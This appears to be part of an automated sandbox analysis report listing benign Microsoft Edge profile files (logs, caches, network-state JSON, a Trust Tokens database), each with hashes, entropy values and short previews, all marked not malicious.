                                                                                                                                                                                                                                                                                          SHA1:ECC12993E83A4F8070D4EB7F3C6FF34E83D1DAE0
                                                                                                                                                                                                                                                                                          SHA-256:8BCB33B28FC90A6D51051CDDD97106F48EF2EA3FCE72D24231B071974BD0CB65
                                                                                                                                                                                                                                                                                          SHA-512:D5B787CA9BD7727AC37EF12884C022CDCB477CF7E05D9C7218200C2BAB87506E85C17B07AEEF7D0AA70ED6CA5E98CEA7638978AB181BD89B4CDC686998B790A8
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:29.126 8ec Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/30-09:55:29.128 8ec Recovering log #3.2024/12/30-09:55:29.128 8ec Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):270336
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                          MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                          SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                          SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                          SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):270336
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                                          MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                                          SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                                          SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                                          SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):430
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.209838344249787
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:yjv8wZYebvqBQFUt8xB/+xP5TwZYebvqBvJ:A8wZYebvZg8GTwZYebvk
                                                                                                                                                                                                                                                                                          MD5:A0F79C83614C20563F5D842EE8AE554D
                                                                                                                                                                                                                                                                                          SHA1:DDEF8DF826CFA0B448FDF6F405A7D2726F9A067A
                                                                                                                                                                                                                                                                                          SHA-256:747BC0776942C5B130127286F35F0EEA4F55D94560BC660F3EFA277DBFB80197
                                                                                                                                                                                                                                                                                          SHA-512:54D17B97E39A77082428D8E9BE1AA5168FA54D8E2832ED5E68DDFADBA02ED10FBA9A46B6E8C63268CAB3B35D67A9655894CD26160AC727FFBCE50FAD34ADC037
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:30.012 1f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/30-09:55:30.013 1f70 Recovering log #3.2024/12/30-09:55:30.017 1f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):430
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.209838344249787
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:yjv8wZYebvqBQFUt8xB/+xP5TwZYebvqBvJ:A8wZYebvZg8GTwZYebvk
                                                                                                                                                                                                                                                                                          MD5:A0F79C83614C20563F5D842EE8AE554D
                                                                                                                                                                                                                                                                                          SHA1:DDEF8DF826CFA0B448FDF6F405A7D2726F9A067A
                                                                                                                                                                                                                                                                                          SHA-256:747BC0776942C5B130127286F35F0EEA4F55D94560BC660F3EFA277DBFB80197
                                                                                                                                                                                                                                                                                          SHA-512:54D17B97E39A77082428D8E9BE1AA5168FA54D8E2832ED5E68DDFADBA02ED10FBA9A46B6E8C63268CAB3B35D67A9655894CD26160AC727FFBCE50FAD34ADC037
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:30.012 1f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/30-09:55:30.013 1f70 Recovering log #3.2024/12/30-09:55:30.017 1f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\0e50a6a2-1e7d-4b3d-9f09-82b78b63e2b5.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\5aef7424-3c22-4d17-87ca-1a1f77554339.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\5dc9992c-cbe2-40bb-afd3-7fe445e99ca9.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):111
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                                                                                                                                          MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                                                                                                                                          SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                                                                                                                                          SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                                                                                                                                          SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):111
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                                                                                                                                          MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                                                                                                                                          SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                                                                                                                                          SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                                                                                                                                          SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF2aa40.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF2aec4.TMP (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                          MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                          SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                          SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                          SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\a5e7b35f-ba64-46e8-ab70-11bf0bffe853.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\fb6b1230-8978-43fd-a686-e0fd103d8bbe.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):80
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                          MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                          SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                          SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                          SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.270289860258683
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:b3mOv8wZYebvqBZFUt8gR/+g065TwZYebvqBaJ:b3z8wZYebvyg8gJ0kTwZYebvL
                                                                                                                                                                                                                                                                                          MD5:926625FEAFEF1E80C679CD58ABC22253
                                                                                                                                                                                                                                                                                          SHA1:9A79ABE2D62ED794026E2B2017282E4BB9743559
                                                                                                                                                                                                                                                                                          SHA-256:F64A20E8FABE985B75FDCD44F1C8FEC8B53C810CFE663048568D31C175BE122B
                                                                                                                                                                                                                                                                                          SHA-512:9CDE289F7422A45988D5F40AF4D2B96E2FEDEC55784F4647949B9E13ABD137B72421FA0AD7B923A37720E641CA50F28E2FD80554782BEDA06565B575ABC1D434
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:48.779 1f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/30-09:55:48.781 1f70 Recovering log #3.2024/12/30-09:55:48.785 1f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):418
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.270289860258683
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:b3mOv8wZYebvqBZFUt8gR/+g065TwZYebvqBaJ:b3z8wZYebvyg8gJ0kTwZYebvL
                                                                                                                                                                                                                                                                                          MD5:926625FEAFEF1E80C679CD58ABC22253
                                                                                                                                                                                                                                                                                          SHA1:9A79ABE2D62ED794026E2B2017282E4BB9743559
                                                                                                                                                                                                                                                                                          SHA-256:F64A20E8FABE985B75FDCD44F1C8FEC8B53C810CFE663048568D31C175BE122B
                                                                                                                                                                                                                                                                                          SHA-512:9CDE289F7422A45988D5F40AF4D2B96E2FEDEC55784F4647949B9E13ABD137B72421FA0AD7B923A37720E641CA50F28E2FD80554782BEDA06565B575ABC1D434
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:2024/12/30-09:55:48.779 1f70 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/30-09:55:48.781 1f70 Recovering log #3.2024/12/30-09:55:48.785 1f70 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1943063119366455
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6:5bcDj3+q2PqLTwi23oH+TcwtpIFUt8Mbckd532WZmw+Mbc1VkwOqLTwi23oH+TcM:qDz+v8wZYebmFUt8PpW/+P1V5TwZYeb7
